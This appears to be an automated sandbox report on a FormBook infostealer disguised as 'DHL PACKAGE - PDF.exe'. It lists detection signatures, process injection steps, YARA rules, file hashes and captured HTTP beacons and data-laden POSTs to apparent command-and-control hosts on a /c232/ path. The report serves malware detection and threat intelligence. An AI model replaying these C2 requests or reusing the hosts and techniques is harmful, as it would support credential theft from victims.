# Analysis Report DHL PACKAGE - PDF.exe

## Overview

### General Information

- Sample Name: DHL PACKAGE - PDF.exe
- Analysis ID: 286161
- MD5: 863bf0dfa1169706f566c070a1e11256
- SHA1: 77175726680e40eeefdad0578a1d3377486d9fff
- SHA256: a102b644fd134778f28e1105e4645e84ff4d05687351990de90ae27a89f0513b

### Detection

FormBook
- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%

### Signatures

Antivirus / Scanner detection for submitted sample
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Hijacks the control flow in another process
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

System is w10x64

- DHL PACKAGE - PDF.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\DHL PACKAGE - PDF.exe' MD5: 863BF0DFA1169706F566C070A1E11256)
- rundll32.exe (PID: 7016 cmdline: rundll32.exe SitulaCystocele,Hurley MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- cmd.exe (PID: 7040 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
- cmd.exe (PID: 7064 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
- explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- autochk.exe (PID: 5536 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
- NETSTAT.EXE (PID: 4912 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
- cmd.exe (PID: 7044 cmdline: /c del 'C:\Windows\SysWOW64\cmd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

## Malware Configuration

No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94; 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91; 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F; 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07; 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06; 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8; 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D; 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4; 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 |
| 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | 0x18339:$sqlite3step: 68 34 1C 7B E1; 0x1844c:$sqlite3step: 68 34 1C 7B E1; 0x18368:$sqlite3text: 68 38 2A 90 C5; 0x1848d:$sqlite3text: 68 38 2A 90 C5; 0x1837b:$sqlite3blob: 68 53 D8 7F 8C; 0x184a3:$sqlite3blob: 68 53 D8 7F 8C |
| 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94; 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91; 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F; 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07; 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06; 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8; 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D; 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4; 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 4.2.cmd.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 4.2.cmd.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94; 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91; 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F; 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07; 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06; 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8; 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D; 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4; 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 |
| 4.2.cmd.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | 0x18339:$sqlite3step: 68 34 1C 7B E1; 0x1844c:$sqlite3step: 68 34 1C 7B E1; 0x18368:$sqlite3text: 68 38 2A 90 C5; 0x1848d:$sqlite3text: 68 38 2A 90 C5; 0x1837b:$sqlite3blob: 68 53 D8 7F 8C; 0x184a3:$sqlite3blob: 68 53 D8 7F 8C |
| 4.2.cmd.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security | |
| 4.2.cmd.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC; 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94; 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91; 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F; 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07; 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06; 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8; 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D; 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4; 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00 |

## Sigma Overview

No Sigma rule has matched

## Signature Overview

### AV Detection:

Antivirus / Scanner detection for submitted sample

- Source: DHL PACKAGE - PDF.exe Avira: detected

Multi AV Scanner detection for dropped file

- Source: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll Virustotal: Detection: 10%
- Source: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dll ReversingLabs: Detection: 16%

Multi AV Scanner detection for submitted file

- Source: DHL PACKAGE - PDF.exe Virustotal: Detection: 49%
- Source: DHL PACKAGE - PDF.exe ReversingLabs: Detection: 33%

Yara detected FormBook

- Source: Yara match File source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match File source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample

- Source: DHL PACKAGE - PDF.exe Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

- Source: 4.2.cmd.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to enumerate / list files inside a directory

- Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_00406469 FindFirstFileA,FindClose, 0_2_00406469
- Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_00402765 FindFirstFileA, 0_2_00402765
- Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040592E

Contains functionality to query local drives

Found inlined nop instructions (likely shell or obfuscated code)

- Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop ebx 4_2_00407B00
- Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 4_2_0040E42D
- Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 4_2_00417C93
- Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop ebx 20_2_00DD7B00
- Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 20_2_00DE7C93
- Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 20_2_00DDE42D

### Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

- Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.4:49738

Uses netstat to query active network connections and open ports

- Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

HTTP GET or POST without a user agent

Source: global traffic HTTP traffic detected:

```
GET /c232/?SX=lR4lSvRlH9c0riw/yBggHM+d5Bo3+JX5bXcEhZWQxRmDMZVsDGe+7OKw8AttMuBfK5wf&CPTTo2=Of5l7bHh76t0 HTTP/1.1
Host: www.shopendora.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
```

Source: global traffic HTTP traffic detected:

```
GET /c232/?SX=ut3XwoAZJP8HSQgtiMu+823Njwb6ecwqvIXCjXOBTiIn6GXyTZBZ4LreNU4Lrku7GkeE&CPTTo2=Of5l7bHh76t0 HTTP/1.1
Host: www.3rdimultimedia.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
```

IP address seen in connection with other malware

- Source: Joe Sandbox View IP Address: 23.227.38.64
- Source: Joe Sandbox View IP Address: 160.153.136.3

Internet Provider seen in connection with other malware

- Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
- Source: Joe Sandbox View ASN Name: GODADDY-AMSDE

Uses a known web browser user agent for HTTP communication

Source: global traffic HTTP traffic detected:

```
POST /c232/ HTTP/1.1
Host: www.3rdimultimedia.com
Connection: close
Content-Length: 408
Cache-Control: no-cache
Origin: http://www.3rdimultimedia.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.3rdimultimedia.com/c232/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Data Raw: 53 58 3d 6d 50 37 74 75 49 49 41 47 65 6b 70 48 52 74 31 39 37 4f 67 6d 6a 4c 5a 6b 54 33 6b 63 4a 4e 68 36 39 32 39 7a 45 36 43 55 41 6f 54 37 43 4c 42 46 73 49 71 28 50 36 5f 53 31 6b 2d 70 31 32 50 4c 30 32 50 76 35 5a 61 5a 37 30 6f 43 4e 53 57 45 67 4d 4c 69 53 4d 65 31 62 4a 48 48 53 6c 46 77 57 7a 38 58 6d 54 59 49 76 35 72 63 71 62 35 4e 66 7a 33 78 74 55 56 71 64 68 2d 67 4e 38 75 49 38 6e 36 72 53 4d 75 33 30 6b 4c 38 69 34 43 36 50 5a 5a 43 55 57 73 65 6f 49 2d 74 5a 4a 49 64 6b 6e 7a 41 75 59 6c 4f 7a 36 4e 42 6f 46 72 7e 5f 34 5f 4a 6c 6b 67 67 38 41 52 67 6d 67 31 44 63 50 54 7a 30 75 66 4f 39 43 69 59 70 77 52 7e 6b 68 33 28 4f 76 4e 59 48 35 4f 45 6d 52 55 4a 77 4a 48 72 73 59 39 4d 70 78 64 4f 6b 28 6b 59 37 6c 76 32 48 57 6c 57 5f 37 53 54 4b 4d 58 47 39 72 79 63 4b 6f 42 43 65 4d 4e 36 75 6c 64 6b 53 28 42 68 4a 59 45 4b 6a 39 56 6e 5f 62 53 7a 53 67 66 33 69 4d 77 46 37 30 4a 35 57 58 53 31 62 46 57 54 77 39 45 63 75 78 66 70 76 47 6e 48 64 49 59 73 73 6a 31 28 35 4e 74 42 4d 7e 73 33 73 5a 51 4a 31 6e 4b 6e 75 55 53 39 4b 52 66 4a 49 55 57 73 4a 56 63 47 30 63 6b 6a 45 32 45 6e 58 71 30 5a 77 6e 6b 59 72 4f 51 64 75 61 41 28 42 7a 67 72 67 68 6f 6b 78 64 44 41 64 73 53 79 77 29 2e 00 00 00 00 00 00 00 00
Data Ascii: SX=mP7tuIIAGekpHRt197OgmjLZkT3kcJNh6929zE6CUAoT7CLBFsIq(P6_S1k-p12PL02Pv5ZaZ70oCNSWEgMLiSMe1bJHHSlFwWz8XmTYIv5rcqb5Nfz3xtUVqdh-gN8uI8n6rSMu30kL8i4C6PZZCUWseoI-tZJIdknzAuYlOz6NBoFr~_4_Jlkgg8ARgmg1DcPTz0ufO9CiYpwR~kh3(OvNYH5OEmRUJwJHrsY9MpxdOk(kY7lv2HWlW_7STKMXG9rycKoBCeMN6uldkS(BhJYEKj9Vn_bSzSgf3iMwF70J5WXS1bFWTw9EcuxfpvGnHdIYssj1(5NtBM~s3sZQJ1nKnuUS9KRfJIUWsJVcG0ckjE2EnXq0ZwnkYrOQduaA(BzgrghokxdDAdsSyw).
```

Source: global traffic HTTP traffic detected:

```
POST /c232/ HTTP/1.1
Host: www.3rdimultimedia.com
Connection: close
Content-Length: 188456
Cache-Control: no-cache
Origin: http://www.3rdimultimedia.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.3rdimultimedia.com/c232/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Data Raw: 53 58 3d 6d 50 37 74 75 4d 38 75 56 4f 77 34 4b 48 31 4f 38 71 7e 6f 69 67 54 4c 67 52 7a 33 56 5f 6b 51 7a 4e 61 58 7a 41 7e 47 64 68 34 4e 78 79 62 42 55 4a 63 68 34 76 36 38 62 56 6b 78 28 46 71 33 47 44 4c 41 76 37 31 6a 5a 37 38 72 4c 75 36 54 45 77 4e 44 6b 79 52 72 6b 37 64 59 48 52 52 65 77 7a 44 61 53 6e 76 59 4e 66 68 70 5a 4c 71 36 4b 61 62 34 76 4e 67 51 6f 5a 38 67 68 5f 34 53 49 65 61 70 39 6e 73 67 67 79 55 63 77 44 4a 6e 77 39 35 73 4d 6b 43 72 62 72 30 74 6f 2d 5a 4d 61 6d 50 52 63 37 73 69 53 33 58 4f 45 76 6f 55 30 74 56 59 4f 78 5a 58 67 37 30 76 75 77 49 65 51 50 37 62 28 67 32 35 57 63 47 73 45 75 52 45 36 6e 4a 38 39 4b 72 79 46 57 4a 4a 44 31 56 42 4b 7a 67 43 75 4d 77 4f 4b 49 4e 72 47 31 50 32 63 73 56 6e 72 58 6d 4b 52 38 4b 49 62 37 73 66 48 50 48 45 54 4b 70 58 45 65 4d 52 78 2d 6c 70 68 79 7a 61 68 35 70 55 4b 6c 5a 50 76 50 33 54 79 52 59 66 6f 7a 63 44 49 72 6b 5f 79 47 6d 72 78 59 4a 64 52 33 63 76 4d 2d 78 39 70 74 65 6f 48 64 49 6c 73 74 6a 54 7e 4d 6c 74 41 64 65 5f 7a 4f 78 71 50 31 6d 61 30 75 45 71 79 61 73 45 4a 4a 38 57 74 37 63 7a 47 48 73 6b 77 43 53 48 6e 32 71 30 66 41 6e 6b 52 4c 50 2d 64 4e 48 58 71 77 43 6e 74 6a 30 44 6d 45 78 52 4e 50 74 61 6f 57 4b 70 50 7a 28 35 6d 70 78 4b 62 49 4a 49 55 51 77 44 28 6a 38 35 33 56 48 38 6e 62 6d 48 78 34 30 51 5a 62 33 55 4b 49 30 35 61 31 6a 54 38 78 57 64 4e 36 42 37 43 45 32 76 6a 4d 59 67 4e 6b 79 4f 48 4f 64 42 70 30 4c 61 55 6e 7e 56 4d 62 61 58 34 4e 76 69 32 64 46 64 75 4a 33 6d 32 47 46 6b 4f 4b 6c 41 78 73 67 74 53 6d 7a 67 77 7a 45 41 75 35 64 4c 68 48 38 61 28 45 39 30 45 55 31 6d 66 33 51 30 4f 31 79 5f 51 58 62 30 59 5a 67 43 6f 64 7e 57 36 37 49 33 76 62 7a 36 4c 75 67 43 7e 54 50 6b 61 48 28 6f 64 70 38 44 79 58 79 52 4f 72 65 75 4b 67 4e 70 74 2d 46 72 6a 64 34 36 78 48 53 2d 32 4d 41 74 68 61 4f 45 47 41 61 66 31 44 41 5a 38 36 6e 72 70 6a 5a 42 37 62 33 51 51 62 69 45 4d 55 31 39 50 63 32 6a 71 75 33 39 57 49 69 53 6b 71 65 6a 5a 4a 4a 41 50 41 72 79 75 44 70 7a 59 35 4e 6e 4e 54 44 59 50 75 4b 79 6f 5f 50 67 73 4a 44 53 64 61 64 75 73 31 4f 73 76 74 4b 61 66 37 43 4a 76 6a 36 4a 6b 6a 37 68 6f 49 75 45 56 4b 66 67 58 55 38 77 4f 77 35 30 33 75 46 35 36 45 4d 33 54 79 7a 34 37 58 65 45 54 57 47 47 39 6d 28 77 7e 4d 42 75 32 6c 58 58 68 7a 64 37 32 4e 39 72 6f 55 7a 4a 6d 58 48 49 70 4a 44 59 6a 66 67 59 49 4d 64 6f 69 31 38 42 6d 4e 33 4d 4a 77 34 6c 79 64 4c 70 75 75 44 65 32 42 71 33 6d 57 68 79 67 66 6a 43 6b 57 46 61 58 58 6e 75 67 37 66 62 52 70 67 43 4c 38 4b 36 6b 6e 56 39 32 53 6b 5a 77 4c 66 56 37 34 72 75 46 74 39 4d 32
```

Source: global traffic HTTP traffic detected:

```
GET /c232/?SX=lR4lSvRlH9c0riw/yBggHM+d5Bo3+JX5bXcEhZWQxRmDMZVsDGe+7OKw8AttMuBfK5wf&CPTTo2=Of5l7bHh76t0 HTTP/1.1
Host: www.shopendora.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
```

Source: global traffic HTTP traffic detected:

```
GET /c232/?SX=ut3XwoAZJP8HSQgtiMu+823Njwb6ecwqvIXCjXOBTiIn6GXyTZBZ4LreNU4Lrku7GkeE&CPTTo2=Of5l7bHh76t0 HTTP/1.1
Host: www.3rdimultimedia.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
```

Performs DNS lookups

- Source: unknown DNS traffic detected: queries for: www.shopendora.com

Posts data to webserver

Source: unknown HTTP traffic detected:

```
POST /c232/ HTTP/1.1
Host: www.3rdimultimedia.com
Connection: close
Content-Length: 408
Cache-Control: no-cache
Origin: http://www.3rdimultimedia.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.3rdimultimedia.com/c232/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Data Raw: 53 58 3d 6d 50 37 74 75 49 49 41 47 65 6b 70 48 52 74 31 39 37 4f 67 6d 6a 4c 5a 6b 54 33 6b 63 4a 4e 68 36 39 32 39 7a 45 36 43 55 41 6f 54 37 43 4c 42 46 73 49 71 28 50 36 5f 53 31 6b 2d 70 31 32 50 4c 30 32 50 76 35 5a 61 5a 37 30 6f 43 4e 53 57 45 67 4d 4c 69 53 4d 65 31 62 4a 48 48 53 6c 46 77 57 7a 38 58 6d 54 59 49 76 35 72 63 71 62 35 4e 66 7a 33 78 74 55 56 71 64 68 2d 67 4e 38 75 49 38 6e 36 72 53 4d 75 33 30 6b 4c 38 69 34 43 36 50 5a 5a 43 55 57 73 65 6f 49 2d 74 5a 4a 49 64 6b 6e 7a 41 75 59 6c 4f 7a 36 4e 42 6f 46 72 7e 5f 34 5f 4a 6c 6b 67 67 38 41 52 67 6d 67 31 44 63 50 54 7a 30 75 66 4f 39 43 69 59 70 77 52 7e 6b 68 33 28 4f 76 4e 59 48 35 4f 45 6d 52 55 4a 77 4a 48 72 73 59 39 4d 70 78 64 4f 6b 28 6b 59 37 6c 76 32 48 57 6c 57 5f 37 53 54 4b 4d 58 47 39 72 79 63 4b 6f 42 43 65 4d 4e 36 75 6c 64 6b 53 28 42 68 4a 59 45 4b 6a 39 56 6e 5f 62 53 7a 53 67 66 33 69 4d 77 46 37 30 4a 35 57 58 53 31 62 46 57 54 77 39 45 63 75 78 66 70 76 47 6e 48 64 49 59 73 73 6a 31 28 35 4e 74 42 4d 7e 73 33 73 5a 51 4a 31 6e 4b 6e 75 55 53 39 4b 52 66 4a 49 55 57 73 4a 56 63 47 30 63 6b 6a 45 32 45 6e 58 71 30 5a 77 6e 6b 59 72 4f 51 64 75 61 41 28 42 7a 67 72 67 68 6f 6b 78 64 44 41 64 73 53 79 77 29 2e 00 00 00 00 00 00 00 00
Data Ascii: SX=mP7tuIIAGekpHRt197OgmjLZkT3kcJNh6929zE6CUAoT7CLBFsIq(P6_S1k-p12PL02Pv5ZaZ70oCNSWEgMLiSMe1bJHHSlFwWz8XmTYIv5rcqb5Nfz3xtUVqdh-gN8uI8n6rSMu30kL8i4C6PZZCUWseoI-tZJIdknzAuYlOz6NBoFr~_4_Jlkgg8ARgmg1DcPTz0ufO9CiYpwR~kh3(OvNYH5OEmRUJwJHrsY9MpxdOk(kY7lv2HWlW_7STKMXG9rycKoBCeMN6uldkS(BhJYEKj9Vn_bSzSgf3iMwF70J5WXS1bFWTw9EcuxfpvGnHdIYssj1(5NtBM~s3sZQJ1nKnuUS9KRfJIUWsJVcG0ckjE2EnXq0ZwnkYrOQduaA(BzgrghokxdDAdsSyw).
```

Urls found in memory or binary data
Contains functionality to read data from the clipboard

### E-Banking Fraud:

Yara detected FormBook

- Source: Yara match File source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match File source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
- Source: Yara match File source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE

### System Summary:

 Detected FormBook malware Show sources
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.343784301.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.502024052.0000000001250000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.344815518.0000000001260000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.344851460.0000000001290000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.501966383.0000000001220000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 
00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000014.00000002.501326161.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 4.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 4.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Contains functionality to shutdown / reboot the system Show sources
 Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033A9
 Detected potential crypto function Show sources
